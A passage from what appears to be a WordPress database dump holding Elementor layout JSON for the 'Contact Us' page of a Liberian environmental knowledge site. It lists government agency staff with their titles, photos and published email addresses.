href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>Monitoring, Control, and Surveillance Field Officer<br \\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>Small Scale Fisheries Officer<br \\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23550,3428,'_elementor_edit_mode','builder'),(23551,3428,'_elementor_template_type','wp-page'),(23552,3428,'_elementor_version','3.0.16'),(23553,3428,'_wp_page_template','default'),(23554,3428,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"